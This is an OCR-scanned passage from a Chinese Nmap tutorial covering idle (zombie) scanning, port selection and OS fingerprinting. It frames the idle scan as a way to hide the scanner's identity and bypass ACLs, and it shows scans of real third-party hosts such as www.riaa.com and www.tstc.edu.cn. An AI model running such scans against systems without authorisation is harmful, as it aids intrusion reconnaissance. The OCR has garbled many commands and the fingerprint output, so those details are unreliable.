增加 了 2， 就 表明 第 三 方 主机 在 这 期 间 向 外 部 发 送 了 数据 包 ， 这 样 就 说 明 目 标 主机 的 端口 
是 开放 的 。 

在 这 个 过 程 中 ， 因 为 需要 伪造 一 个 源 地 址 为 第 三 方 的 数据 包 ， 所 以 必须 要 求 扫描 工具 具 
有 伪造 数据 包 的 能 力 ，Nmap 已 经 有 了 decoy scanning (-D) 的 功能 ， 可 以 帮助 使 用 者 隐藏 自 
己 的 身份 。 要 知道 任何 发 往 目标 主机 的 数据 包 都 有 可 能 被 目标 主机 的 日 志 记 录 下 来 ， 而 通过 
idle 扫描 方式 ， 目 标 主机 日 志 中 记录 下 来 的 是 第 三 方 的 地 址 。 

idle 扫描 的 另 一 个 优势 在 于 可 以 绕 开 网 络 中 的 一 些 安全 机 制 ， 如 路 由 器 中 的 访问 控制 
列表 技术 (ACL)， 某 些 单位 的 内 部 网 络 限制 只 允许 指定 IP 地 址 对 其 内 部 进行 访问 。 有 些 
时 候 ， 一 些 工作 人 员 为 了 方便 ， 经 常会 在 防火 墙 或 者 路 由 器 上 设置 例外 ， 人 允许 他 们 从 家 
中 对 单位 的 网 络 进行 访问 。 如 果 没 有 做 好 安全 保障 ， 这 其 实 是 一 种 相当 危险 的 做 法 。 
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idle 扫描 的 缺点 也 同样 明显 ， 通 常 一 个 SYN 扫描 所 需要 花费 的 时 间 只 是 几 秒 ， 而 idle 扫 
描 的 扫描 时 间 要 远 远 多 于 这 个 时 间 ， 另 一 点 就 是 很 多 时 候 ， 宽 带 提供 商 并 不 会 允许 你 向 外 发 
送 伪 造 的 数据 包 。 还 有 最 为 重要 的 一 点 是 ，idle 扫描 要 求 你 必须 能 找到 一 个 正在 工作 的 第 三 
方 主机 。 

这 其 实 是 一 个 并 不 简单 的 问题 ， 首 先 这 台 第 三 方 主机 产生 IP ID 的 方法 必须 是 整体 增加 
的 ， 而 不 是 根据 每 个 通信 自行 开始 的 ， 最 好 是 空闲 的 ， 因 为 大 量 的 无 关 流量 将 会 导致 结果 极 
为 混乱 。 当 然 主机 与 第 三 方 主机 的 延迟 小 也 是 理想 的 情况 。 

那么 如 何 查 看 一 台 主机 是 否 适合 作为 一 台 第 三 方 主机 呢 ? 方法 一 是 ， 在 对 一 台 主 机 进行 
扫描 的 时 候 ， 执 行 一 个 端口 扫描 以 及 操作 系统 检测 ， 启 动 详细 模式 ( -v)， 操 作 系 统 就 会 检测 
IP ID 增长 方法 ， 如 果 返 回 值 为 “IP ID Sequence Generation: Incremental”， 这 是 一 个 好 消息 。 
但 还 需要 确定 一 下 ， 因 为 很 多 系统 其 实 为 每 一 个 通信 开启 了 一 个 IPID， 另 外， 如 果 这 台 主 机 
和 外 界 进行 大 量 的 通信 ， 这 种 方法 也 是 不 适用 的 。 

方法 二 是 运行 ipidseq NSE 脚本 。 关 于 脚本 的 问题 ， 后 面 会 详细 描述 。 

好 了 ， 当 找到 一 台 第 三 方 主机 后 ， 一 切 就 都 简单 了 。 例 如 使 用 sI 参数 指定 kiosk.adobe. 
com 作为 第 三 方 主机 ， 然 后 对 www.riaa.com 进行 扫描 。 扫 描 结果 如 下 。 


Nmap -Pn -p- -sI kiosk.adobe.com www.riaa.com 

Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds 

Starting Nmap ( http://Nmap.org ) 

Idlescan using zombie kiosk.adobe.com (192.150.13.111:80); Class: Incremental 
Nmap scan report for 208.225.90.120 

(The 65522 ports scanned but not shown below are in state: closed) 








Port State Service 
21/tcp open ftp 
25/tcp open smtp 
80/tcp open http 
111/tcp open sunrpc 
135/tcp open loc-srv 
443/tcp open https 
1027/tcp open IIS 
1030/tcp open iadl 
2306/tcp open unknown 
5631/tcp open pcanywheredata 
7937/tcp open unknown 
7938/tcp open unknown 
36890/tcp open unknown 


Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds 


3.5 ”指定 扫描 的 端口 
在 扫描 过 程 中 也 可 以 指定 扫描 的 端口 。 表 3-4 给 出 了 端口 的 指定 方法 。 
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表 3-4 ”指定 扫描 端口 的 方法 
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指定 端口 指定 端口 的 选项 
扫描 常见 的 100 端口 -F [target] 
指定 某 一 个 端口 -p [port] 
使 用 名 字 来 指定 扫描 端口 -p [name] 
使 用 协议 指定 扫描 端口 -pU: [UDP ports], T: [TCP ports 
扫描 所 有 端口 p* 
扫描 常用 端口 --top-ports [number] 





1. 扫描 常见 的 100 个 端口 
命令 语法 : -F [target] 
对 目标 192.168.153.131 的 100 个 常见 端口 进行 扫描 ,命令 如 下 。 


nmap -F 192.168.153.131 


2. 指定 某 一 个 端口 

命令 语法 : nmap -p [port] [target] 

对 目标 192.168.153.131 的 80 端口 进行 扫描 ， 命 令 如 下 。 

nmap -p 80 192.168.153.131 

3. 使 用 名 字 来 指定 扫描 端口 

命令 语法 : nmap -p [port name(s)] [target] 

对 目标 192.168.153.131 的 smtp, http 端口 进行 扫描 ， 命 令 如 下 。 
nmap -p smtp,http 192.168.153.131 

4. 使 用 协议 指定 扫描 端口 

命令 语法 : nmap -p U: [UDP ports],T:[TCP ports] [target] 

对 目标 192.168.153.131 的 53 端口 进行 UDP 扫描 ，25 端口 进行 TCP 扫描 ， 命 令 如 下 。 


nmap -SU -sT -p U:53,T:25 192.168.153.131 


5. 扫描 所 有 端口 

命令 语法 : nmap -p "*" [target] 

对 目标 192.168.153.131 的 所 有 端口 进行 扫描 ， 命 令 如 下 。 
nmap -p * 192.168.153.131 

这 个 扫描 方法 消耗 很 大 资源 ， 要 慎 用 。 

6. 扫描 常用 端口 


命令 语法 : nmap --top-ports [number] [target] 
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对 目标 192.168.153.131 常见 的 10 个 端口 进行 扫描 ， 命 令 如 下 。 


nmap --top-ports 192.168.153.131 


小 结 


本 章 介绍 了 端口 的 相关 概念 ， 并 给 出 了 Nmap 中 对 端口 进行 扫描 的 各 种 技术 。 另 外 通过 
本 章 的 学 习 ， 读 者 也 学 到 了 如 何在 扫描 过 程 中 自行 决定 扫描 的 端口 。 第 4 章 将 介绍 Nmap 的 
高 级 部 分 一 一 服务 扫描 和 操作 系统 扫描 。 


远程 操作 系统 与 服务 检测 技术 


本 章 仍然 要 以 一 个 小 案例 来 开始 。 

刘 开 是 一 家 IT 公司 的 网 络 管理 人 员 ， 由 于 公司 内 部 的 网 络 经 常 受到 来 自 外 部 的 攻击 ， 他 
费 了 九 牛 二 虎 之 力 才 说 服 总 经 理 购 买 了 一 台 某 品牌 的 防火 墙 设备 。 就 在 新 设备 开始 使 用 没 几 天 ， 
网 络 部 门 的 值班 人 员 接 到 了 自称 来 自 “该 品牌 售后 部 门 ”的 电话 ， 这 个 “售后 人 员 ” 准确 地 说 
出 了 该 公司 所 购买 的 设备 型 号 ， 并 指出 他 们 目前 所 使 用 的 图 形 化 管理 软件 可 能 会 引起 死机 的 情 
况 ， 目 前 的 解决 方案 是 下 载 安装 该 品牌 最 新 的 图 形 化 管理 软件 ， 并 给 出 了 一 个 该 品牌 的 网 页 链 
接 。 值 班 人 员 经 过 检查 确实 是 该 品牌 的 链接 以 后 ， 放 心地 打开 了 这 个 链接 ， 但 是 却 无 法 找到 文 
件 下 载 链接 。 这 时 “售后 人 员 ” 提 出 通过 邮件 附件 的 方式 发 送 这 个 文件 ， 值 班 人 员 下 载 并 安装 
了 这 个 文件 。 几 和 天后， 该 公司 的 大 量 信息 被 泄露 。 事 后 发 现 ， 该 品牌 并 没有 这 个 “售后 人 员 ”。 

抛 开 社 会 工程 学 的 内 容 不 谈 ， 入 侵 者 是 如 何 知 刘 开 公司 购买 设备 的 型 号 呢 ? 他 偷 看 了 
刘 开 公司 的 发 货 单 ， 抑 或 扔 掉 的 包装 箱 ? 但 是 还 有 一 种 可 能 ， 就 是 黑客 在 远程 扫描 刘 开 公司 
的 网 络 ， 他 发 现 了 一 台新 的 设备 ， 而 且 知 道 了 它 的 型 号 。 但 是 这 一 切 又 是 如 何 成 功 的 呢 ? 

本 章 将 介绍 如 下 内 容 。 

口 远程 操作 系统 检测 。 

口 操作 系统 指纹 。 

口 利用 操作 系统 检测 技术 进行 管理 。 

口 进行 服务 发 现 。 

口 使 用 Nmap 进行 服务 发 现 。 

口 服务 发 现 的 技术 与 原理 。 














e 
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4.1 远程 操作 系统 检测 简介 


其 实 很 多 著名 的 工具 都 提供 远程 对 操作 系统 进行 检测 的 功能 ， 这 一 点 用 在 入 侵 上 就 可 以 
成 为 黑客 的 工具 ， 而 用 在 网 络 管理 上 就 可 以 进行 资产 管理 和 操作 系统 补丁 管理 。 你 也 可 以 使 





用 Nmap 在 网 络 上 找到 那些 已 经 过 时 的 系统 或 者 未 经 授权 的 系统 。 


但 是 并 没有 一 种 工具 可 以 提供 绝对 准确 的 远程 操作 系统 信息 。 几 乎 所 有 的 工具 都 使 用 
了 一 种 “ 猜 ” 的 方法 。 当 然 ， 这 不 是 凭空 猜测 ， 而 是 通过 向 目标 发 送 探 针 ， 然 后 根据 目标 的 








回应 来 猜测 系统 。 这 个 探 针 大 都 是 以 TCP 和 UDP 数据 包 的 形式 ， 检 查 的 细节 包括 初始 序列 


号 (ISN), TCO 选项 、 卫 标识 符 (ID) 数字 时 间 戳 、 显 示 拥 塞 通知 (ECN)、 窗 口 大 小 等 。 每 





个 操作 系统 对 于 这 些 探 针 都 会 做 出 不 同 的 响应 ， 这 些 工具 提取 出 这 些 响应 中 的 特征 ， 


然后 


记录 在 一 个 数据 库 中 。Nmap 进行 识别 的 探 针 和 响应 对 应 的 关系 保存 在 Nmap-os-db 文件 中 。 


Nmap 会 尝试 验证 如 下 参数 。 
O 供应 商 的 名 字 : 操作 系统 的 供应 商 的 名 字 ， 比 如 微软 或 者 SUN, 
口 操作 系统 : 操作 系统 的 名 字 ， 比 如 Windows, Mac OS X, Linux 等 。 


O 操作 系统 的 版 本 : 比如 Windows XP, Windows 2000, Windows 2003 , Windows 2008 等 。 
口 当前 设备 的 类 型 : 比如 通用 计算 机 、 打 印 服务 器 、 媒 体 播放 器 、 路 由 器 、WAP 或 者 


电力 装置 等 。 
除了 这 些 参 数 以 外 ， 操 作 系 统 检测 还 提供 了 关于 系统 运行 时 间 和 TCP 序列 可 预 涡 





I 性 信息 


的 分 类 ， 在 命令 行 中 使 用 -O 参数 通过 端口 扫描 来 完成 对 操作 系统 的 扫描 , 如 图 4-1 所 示 。 
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图 4-1 使 用 Nmap 对 目标 操作 系统 进行 检测 
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这 个 命令 将 会 使 用 Nmap 默认 的 SYN 扫描 方式 来 完成 端口 检测 ， 不 过 操作 系统 检测 选 
项 可 以 和 任何 其 他 的 检测 技术 相 结 合 使 用 。Nmap 包括 多 个 命令 行 参 数 来 实现 操作 系统 检测 。 
例如 ， 如 果 采 用 --osscan-limit 选项 ,Nmap 只 对 满足 “同时 具有 状态 为 open 和 closed 的 端口 ” 
这 个 条 件 的 主机 进行 操作 系统 检测 ， 特 别 在 使 用 -P0 扫描 多 个 主机 时 可 以 节约 很 多 时 间 。 注 
意 这 个 选项 仅 在 使 用 -O 或 -A 进行 操作 系统 检测 时 起 作用 。 

从 上 面 的 扫描 示例 中 也 能 看 出 ，Nmap 默认 会 对 无 法 精确 匹配 的 结果 进行 推测 。 表 4-1 
中 给 出 了 具体 的 选项 。 





表 4-1 Nmap 中 扫描 目标 操作 系统 的 可 选项 
意 x 
只 对 满足 “同时 具有 状态 为 open 和 closed 的 端口 ”条 件 的 主机 进行 操作 系 
统 检测 
猜测 认为 最 接近 目标 的 匹配 操作 系统 类 型 
对 操作 系统 检测 尝试 的 次 数 ， 默 认为 5 


选 项 





--osscan-limit 


--Osscan-guess 


--max-retries 
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远程 判断 目标 计算 机 操作 系统 的 方法 一 般 可 以 分 成 两 类 。 
口 被 动 式 方法 : 并 不 向 目标 系统 发 送 任何 数据 包 ， 而 是 通过 各 种 抓 包 工具 来 收集 流 经 网 
络 的 数据 报 文 ， 再 从 这 些 报 文 中 得 到 目标 计算 机 的 操作 系统 信息 。 
口 主动 式 方法 : 指 客户 端 主动 向 远程 主机 发 送信 息 ， 远 程 主机 一 般 要 对 这 些 信息 做 出 反 
应 ， 回 复 一 些 信 息 ， 发 送 者 对 这 些 返回 的 信息 进行 分 析 ， 就 有 可 能 得 知 远程 主机 的 操 
作 系 统 类 型 。 这 些 信息 可 以 是 通过 正常 的 网 络 程序 如 Telnet, FTP 等 与 主机 交互 的 信 
息 ， 也 可 以 是 一 些 经 过 精心 构造 、 正 常 的 或 残缺 的 数据 报 文 。 
Nmap 并 不 使 用 被 动 式 的 方法 。Nmap 中 的 主动 式 方法 采用 多 达 15 个 探 针 的 操作 系统 指 
纹 扫描 包 。 操 作 系 统 指纹 这 个 名 字 来 源 于 生物 学 上 的 名 词 指纹 。 因 为 人 的 指纹 都 是 独一无二 
的 ， 因 此 可 以 作为 身份 验证 的 一 种 机 制 。 同 样 每 一 种 类 型 的 操作 系统 也 都 有 自己 的 特征 ， 通 
过 向 一 台 计 算 机 发 送 特定 格式 的 探 针 (数据 包 ) 来 查看 目标 主机 的 响应 数据 ， 这 一 过 程 就 是 
操作 系统 指纹 分 析 的 过 程 。 这 些 强大 的 探 针 利 用 了 TCP, UDP, ICMP 等 各 种 协议 。 这 些 探 
针 经 过 巧妙 设计 ， 可 以 发 现 目标 操作 系统 细微 的 差别 。 
Nmap 中 对 数据 包 进行 调整 的 部 分 包括 窗口 大 小 、 窗 口 字段 、 分 片 标 识 、 时 间 戳 、 序 号 
以 及 其 他 一 些 细节 ， 例 如 TTL 等 。 这 些 探 针 的 结构 都 很 简单 ， 但 是 它们 都 是 被 精心 设计 出 来 
的 ， 以 便 观察 目标 系统 的 反应 ， 从 而 发 现 不 同 操作 系统 之 间 的 差异 。 另 外 这 里 还 有 一 个 扩展 
的 方法 ， 你 可 以 自己 来 设计 探 针 数据 包 ， 并 将 它 发 送 到 不 同 的 操作 系统 中 ， 以 观察 各 个 操作 
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系统 的 反应 ， 并 将 这 些 反应 保存 到 Nmap 中 的 操作 系统 指纹 数据 库 中 。 

各 种 不 同 的 操作 系统 在 接收 这 些 探 针 文件 以 后 会 回应 不 同 的 信息 ， 这 些 独特 的 特征 会 被 
保存 到 Nmap 的 操作 系统 指纹 数据 库 中 ， 这 个 文件 名 为 Nmap-os-db。 以 后 在 进行 扫描 的 时 
候 ，Nmap 就 会 将 目标 系统 的 扫描 结果 与 这 个 数据 库 中 的 文件 进行 比 对 ， 然 后 得 出 目标 操作 


系统 的 类 型 。 


在 Nmap 扫描 中 ， 可 以 简单 地 使 用 -O 选项 来 完成 对 目标 操作 系统 的 扫描 。 例 如 : 


Nmap -F -O «ip address» 

这 个 扫描 过 程 中 ， 并 不 需要 对 网 络 造成 多 大 
的 负担 ， 虽 然 包含 了 大 量 的 信息 ,但 是 每 一 个 探 
针 文 件 体 积 都 很 小 。 图 4-2 给 出 了 一 个 在 Nmap 进 
行 扫描 时 所 消耗 的 系统 资源 ， 与 其 他 软件 相对 比 ， 
Nmap 在 进行 这 个 扫描 时 所 需要 的 资源 并 不 多 。 

虽然 基本 的 操作 系统 扫描 效果 已 经 很 好 了 ,不 
过 Nmap 中 还 提供 了 更 多 的 选项 来 保证 灵活 性 。 当 
然 ， 随 着 我 们 不 断 调整 扫描 的 选项 ， 也 可 能 会 为 系 
统 带 来 更 大 的 负担 。 另 外 ， 这 些 额外 的 操作 也 泄漏 
了 我 们 更 多 的 信息 。 这 样 就 会 增加 暴露 的 风险 。 除 
了 被 目标 系统 发 现 ， 我 们 还 可 能 会 被 目标 网 络 的 保 
护 机 制 例如 IPS/IDS 所 发 觉 。 

另外 一 点 非常 值得 注意 的 就 是 ， 我 们 的 扫描 很 
有 可 能 落 入 了 陷阱 ， 这 么 说 的 意思 就 是 指 ， 扫 描 的 
目标 很 有 可 能 是 对 方 设置 好 的 一 个 “ 蜜 饶 ”。 在 我 
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图 4-2 在 对 目标 进行 操作 系统 类 型 扫描 
时 所 消耗 的 系统 资源 


们 自 以 为 获取 了 很 重要 的 信息 的 时 候 ， 目 标的 管理 人 员 可 能 正在 研究 我 们 的 所 有 行为 。 本 书 


并 不 会 详细 讲解 蜜 钢 技 术 ， 如 果 对 此 感 兴趣 ， 可 以 查找 一 些 关 于 “ 蜜 负 ” 的 资料 。 





4.3 ”操作 系统 指纹 扫描 作为 管理 工具 


Nmap 并 不 仅仅 是 为 渗透 者 设计 的 ， 它 同样 可 以 作为 网 络 管理 者 的 一 个 利器 。 利 用 这 款 
工具 ， 网 络 管理 者 可 以 节省 大 量 的 时 间 和 精力 ， 接 下 来 看 看 操作 系统 指纹 扫描 能 带 来 什么 好 


处 。 下 面 对 一 个 子 网 执行 如 下 命令 。 
Nmap --O «ip subnet» 


或 者 也 可 以 使 用 如 下 的 语句 。 
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Nmap -sV -F --fuzzy --osscan-guess 目标 ip 

如 果 和 希望 通过 Nmap 准确 检测 到 远程 操作 系统 是 比较 困难 的 ， 这 里 的 -osscan-guess 是 
Nmap 的 猜测 功能 选项 ， 猜 测 认为 最 接近 目标 的 匹配 操作 系统 类 型 。 看 起 来 这 只 是 一 条 简单 
的 命令 ， 但 是 这 也 可 能 是 一 个 黑客 开始 攻击 的 步 又。 可 以 想象 一 下 ， 如 果 黑 客 利 用 这 条 命令 
就 可 以 简单 地 发 现 目 标 网 路 中 那些 老 旧 的 、 容 易 被 渗透 的 系统 ， 另 外 即使 目标 使 用 了 全 新 的 
操作 系统 ， 他 们 也 可 以 快速 地 获取 目标 上 那些 不 安全 的 应 用 。 这 样 极 大 地 节省 了 攻击 者 渗透 
进入 系统 的 时 间 。 作 为 系统 的 维护 者 ， 必 须 抢 在 黑客 之 前 发 现 系统 的 问题 。 

事实 上 ，Nmap 并 没有 能 力 百 分 之 一 百 地 确定 目标 的 操作 系统 ， 只 能 依靠 猜测 。 而 有 时 
Nmap 无 法 确定 目标 具体 的 操作 系统 ， 在 这 种 情况 下 ，Nmap 会 输出 目标 系统 的 TCP/IP 指纹 
文件 ， 并 给 出 各 个 系统 类 型 的 可 能 性 。Nmap 也 希望 我 们 可 以 提交 这 个 指纹 文件 和 最 终 验 证 
的 该 系统 的 真实 类 型 ， 以 帮助 Nmap 更 新 操作 系统 指纹 数据 库 。 可 使 用 Nmap 对 www.tste. 
edu.cn 进行 扫描 ， 以 获取 该 主机 的 操作 系统 类 型 。 

Nmap -0 -F --fuzzy --osscan-guess www.tstc.edu.cn 


这 个 扫描 命令 的 结果 如 图 4-3 所 示 。 


Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-02 13:55 ?D1úżêx?êt?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 

Host is up (0.0063s latency). 

rDNS record for 211.81.200.8: wlx.tstc.edu.cn 

Not shown: 97 closed ports 

PORT STATE SERVICE 

B0/tcp open http 

111/tcp open rpcbind 

8009/tcp open ajp13 

Aggressive OS guesses: Sony Bravia W600-, W800-, or W900-series TV (96%), 
Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 
2.6.17) (94%), HP P2000 G3 NAS device (94%), Android 4.3 (93%), 

CyanogenMod 11 (Android 4.4.4) (93%), Android 4.1.1 (93%), Android 4.1 
(Linux 3.4) (93%), Android 4 (93%) 

No exact OS matches for host (If you know what OS is running on it, see 
https://nmap.org/submit/ ). 

TCP/IP fingerprint: 

OS:SCAN(V-7 .12XE-4XD-9/ 2X0T-B0XCT-7XCU-31290XPV-NXDS-4*DC- IXG- YXTM-57C9147B 
OS:XP-i686-pc-windows-windows)SEQ(SP-102XGCD-1XISR-10CXTI-ZXCI-ZXII-IXTS-7) 
0S:0PS(01-M5B45T11X02-M5B45T11X03-M5B4NNT11X04-M5B45T11X05-M5B45T11X06-M5B4 
OS:ST11)WIN(W1-2DA093942-2DA033/3- 2DAG33WA - 2DAG9QW5 - 2DAG3W6- 2DAO ) ECN( R- YXDF - YXT - 
05:4055-3354X0-MSBANNS&CC- YXQ- ) T1 (R2 YXDF - Y&T-40€S -O&A- S«SF -ASSRD-0X0- ) T2 (R- 
OS:N)T3(R-N) TA (R- YXDF - Y&T-4030/- 03S - ASA - Z&6F - RXO-XRD-0X0- ) T5 (R=Y%DF=Y%T=46%W= 
OS :0XS-ZXA-S«XF-ARXO-XRD-0XQ- ) T6 (R- YXDF - YXT-4099/- XS -AXA-ZXF -RXO-XRD-0XQ- ) T 
05:7 (Rz YXDF - YXT-409G- XS - Z&A- SF -ARKO-XRD-0XQ- )U1 (R- YXDF -NXT-40XIPL-164XUN 
OS: -OXRIPL-GERID-GXRIPCK-GXRUCK-G&RUD-G)IE (R-YXDFI-NXT-40XCD-S) 





H 








Network Distance: 4 hops 


OS detection performed. Please report any incorrect results at https:// 
nmap.org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds 

1 











图 4-3 在 对 目标 进行 操作 系统 类 型 扫描 时 产生 的 系统 指纹 
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在 这 次 扫描 中 ,并 没有 得 到 目标 系统 的 准确 值 ， 但 是 却 可 以 看 到 结果 给 出 了 一 个 TCP/IP 
fingerprint 的 值 (就 是 上 图 中 OS 后 面 的 所 有 内 容 )。 


SCAN (V=7 .12%E=4%D=9/2%0T=80%CT=7%CU=31290%PV=N%DS=4%DC=I%G=Y%TM=57C9147B 
P=i686-pc-windows-windows) 

SEQ(SP-102$GCD-1$ISR-10C$TI-Z$CI-Z$II-I$TS-7 
OPS(01-M5B4ST11$02-M5B4ST11$03-M5B4NNT11$04-M5B4ST11$05-M5B4ST11$06-M5B4 ST11) 
WIN (W1-2DA0$W2-2DA0£W3-2DA0$W4-2DA0$W5-2DA0$W6-2DA0) 

ECN (R=Y%DF=Y%T= 40$W-3354$0-MSBA4NNS$CC-Y$Q- 

T1 (R=Y%DF=Y%T=40%S=O0%A=S+%F=AS%RD=0%Q=) 

T2 (R= N) 

T3 (R=N) 

T4 (R=Y%DF=Y%T=40%W=0%S=A%A=2Z$%F=R%O0=%RD=0%Q= 

TS5 (R=Y%DF=Y%T=40%W= 0%S=Z%A=S+%F=AR%O=%RD=0%Q=) 

T6 (R=Y%DF=Y%T=40%W=0%S=A%A=2Z%F=R%O=%RD=0%Q= 

T7 (R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) 

Ul (R=Y%DF=N%T=40%IPL=164%UN =0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) 

IE (R=Y%DFI=N%T=40%CD=S) 


下 面 详细 介绍 一 下 这 个 输出 的 意义 。 

首先 ， 这 个 输出 并 非 一 次 扫描 的 结果 ， 而 是 多 次 扫描 的 结果 ， 这 些 扫描 包括 SCAN, 
SEQ, OPS, WIN, ECN, TI ~ T7, Ul 和 IE。 

每 一 次 扫描 的 结果 又 都 使 用 % 作为 分 隔 符 ， 例 如 TI 扫描 的 结果 就 是 (R=Y%DF=Y%T=4 
0%S=O%A=S+%F=AS%RD=0%Q=)。 有 的 扫描 内 容 可 能 为 空 ， 例 如 RD=0， 表 示 RD 的 结果 就 
是 0， 即 并 没有 得 到 什么 实际 内 容 。 测 试 结果 必须 完全 匹配 操作 系统 指纹 的 定义 ， 这 样 才能 与 
指纹 数据 库 中 的 条 目 进行 匹配 。 像 T2(R= N) 中 的 R=N 表示 这 次 测试 没有 任何 返回 结果 。 

下 面 将 这 个 输出 的 结果 分 解 成 多 个 块 来 分 析 。 


SCAN (V=7 .12%E=4%D=9/2%0T=80%CT=7%CU=31290%PV=N%DS=4%DC=I%G=Y%TM=57C9147B 
P=i686-pc-windows-windows) 


这 一 行 表示 当前 进行 扫描 使 用 的 Nmap 版 本 以 及 一 些 其 他 的 相关 本 地 信息 。 例 如 : 
V=7.12 表示 当前 使 用 的 Nmap 的 版 本 为 7.12。 

D=9/2 给 出 了 扫描 的 日 期 。 

OT=80%CT=7 指出 了 在 指纹 识别 过 程 中 使 用 的 TCP 端口 。 

CU=31290 指出 了 在 指纹 识别 过 程 中 使 用 的 UDP 端口 。 

PV-N 指出 了 目标 IP 地址 是 否 属于 私有 地 址 。 

DS=4 指出 了 从 Nmap 所 在 主机 到 目标 主机 的 距离 跳 数 。 

G=Y 指出 了 这 次 扫描 的 结果 较 好 ， 可 以 提交 给 iNSEcure. Org. 

TM=57C9147B 指出 了 扫描 所 消耗 的 时 间 。 

P-i686-pc-windows-windows 指出 了 Nmap 所 在 主机 的 操作 系统 类 型 。 

下 面 检查 一 下 SEQ、OPS、WIN 和 TI1 这 些 行 ， 这 些 结果 是 通过 向 目标 上 开放 的 TCP 端 
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口 发 送 一 组 非常 巧妙 的 探 针 而 得 到 的 。 
SEQ 测试 的 结果 如 下 。 
SEQ(SP-102$GCD-1$ISR-10C$TI-Z$CI-Z$II-I$TS-7) 
SP-102 给 出 了 TCP 的 初始 序列 号 (ISN)。 
GCD-1 给 出 了 TCP 的 增 量 。 
ISR=10C 表示 ISN 的 序 率 。 
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TIEZ 给 出 了 SEQ 探 针 回应 数据 包 中 IP 头 部 的 ID 值 。 这 里 面 的 乙 表 示 所 有 IP 数据 包 中 


的 id 字段 都 设置 为 0。 
IL- 14518 T ICMP 探 针 回应 数据 包 中 的 IP 头 部 的 ID 值 。 
TS =7 给 出 了 返回 的 TCP 数据 包 的 时 间 戳 的 信息 。 
OPS 测试 的 结果 如 下 。 


OPS (O01=M5B4ST11%02=M5B4ST11%03=M5BANNT11%04=M5B4ST11%05=M5B4ST11%06=M5B4 ST11) 


O1 = M5B4 给 出 了 TCP 数据 包 每 次 能 够 传输 的 最 大 数据 分 段 。 
ST11 给 出 了 ACK 的 可 选 信息 和 数据 包 的 时 间 戳 内 容 。 

N 表示 为 空 操 作 。 

W0 指出 了 窗口 大 小 。 


02 -MSBASTIINWO, O3 -MSB4NNTIINWO, O4-MSBASTII, OS-MSBASTII, 


O6-MSB4 ST11 这 5 项 的 意义 与 O1 相同 。 
WIN 测试 的 结果 如 下 。 
WIN (W1-2DA0$W2-2DA0$W3-2DA0$W4-2DA0$W5-2DA0€W6-2DAO0) 
这 个 测试 给 出 了 6 个 探 针 返回 值 的 初始 化 窗口 大 小 : 
W1=2DA0 
W2=2DA0 
W3=2DA0 
W4=2DA0 
W5=2DA0 
W6=2DA0 
最 后 看 到 的 一 行 如 下 。 
ECN (R-Y$DF-Y$T-40$W-3354$0-M5BANNS$CC-Y$Q-) 
R =Y 表示 目标 是 否 对 我 们 进行 了 回应 。 
DF=Y 表示 IP 数据 包 的 分 段 标志 位 是 否 被 设置 。 
T=40 给 出 了 回应 数据 包 IP 中 的 TT1 值 。 
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W= 3354 表示 TCP 初始 化 窗口 的 大 小 信息 。 

O = M5BANNS 表示 TCP 选项 的 信息 。 

CC =Y 给 出 了 目标 的 拥塞 控制 能 力 。Y 表示 这 里 的 目标 支持 ECN。 

下 面 我 们 来 看 一 下 第 二 波 发 送 的 6 个 TCP 数据 包 的 回应 。 

第 一 个 TCP 探 针 的 回应 如 下 。 

T1 (R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=) 

Nmap 发 送 的 第 二 个 探 针 是 一 个 设置 了 DF 位 的 内 容 为 空 的 数据 包 。 这 个 数据 包 的 窗口 
大 小 为 128， 回 应 如 下 。 

T2 (R= N) 

Nmap 发 送 的 第 三 个 探 针 是 一 个 设置 了 FIN、URG、PSH 以 及 SYN 标识 的 数据 包 ， 这 个 
数据 包 的 大 小 为 256， 回 应 如 下 。 

T3(R = N) 

Nmap 发 送 的 第 四 个 探 针 是 一 个 设置 了 ACK 位 的 TCP 数据 包 ， 这 个 包 同 样 也 设置 了 DF 
位 ， 大 小 为 1024， 回 应 如 下 。 

T4 (R-Y$DF-Y$T-40$W-0$S-A$A-Z$F-R$O-$RD-0$Q-). 

Nmap 发 送 的 第 五 个 探 针 是 一 个 窗口 大 小 为 31 337 的 数据 包 ， 回 应 如 下 。 

T5 (R-YSDF-Y$T-405$W-0$S-Z$A-S**$F-ARSO-SRD-0$0Q-) 

Nmap 发 送 的 第 六 个 数据 包 和 第 四 个 数据 包 十 分 相似 ， 只 是 窗口 大 小 为 32 768， 而 且 这 
个 数据 包 通 常 是 发 往 关闭 的 端口 ， 回 应 如 下 。 

T6 (R-YS$DF-Y$T-40$W-0$S-A$A-Z$F-R$O-$RD-0$0Q-) 

Nmap 发 送 的 第 七 个 数据 包 设置 了 FIN、URG fil PSH 标志 位 。 这 个 探 针 同样 发 往 一 个 关 
闭 的 端口 ， 窗 口 大 小 为 65 535， 回 应 如 下 。 

T7 (R-YS$DF-Y$T-40$W-0$S-Z5$A-S*$F-ARÉO-S$RD-0$0Q-) 

UI 的 结果 是 根据 UDP 数据 包 探 针 返 回 的 结果 ， 这 个 探 针 的 数据 部 分 是 300 个 C 字 符 ， 
回应 如 下 。 

U1(R-Y$DF-N$T-40$IPL-164$UN -O0SRIPL-GSRID-GS$RIPCK-G$RUCK-GS$RUD-G) 

IE 探 针 基于 ICMP 协议 ， 由 两 个 探 针 组 成 : 

IE(R-YS$SDFI-N$T-40$CD-S) 

至 此 已 经 完成 了 操作 系统 指纹 的 分 析 ， 这 时 你 可 能 会 有 一 个 疑问 ， 该 如 何 才能 应 用 到 这 
些 知识 呢 ? 

当 在 单位 中 对 设备 进行 管理 的 时 候 ， 网 络 中 可 能 存在 各 种 型 号 的 交换 机 、 路 由 器 、 存 储 
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设备 、 服 务 器 等 ， 可 以 对 这 些 设备 的 操作 系统 指纹 信息 进行 处 理 ， 然 后 改善 你 的 操作 系统 指 
纹 信息 数据 库 。 利 用 这 些 信 息 ， 可 以 更 好 地 对 网 络 进 行 管理 。 例 如 ， 所 在 单位 的 某 个 部 门 申 
请 了 50 台 服 务 器 ， 而 且 声 称 这 些 设备 都 在 使 用 中 ， 如 果 想 了 解 设备 的 确切 使 用 情况 ， 就 可 
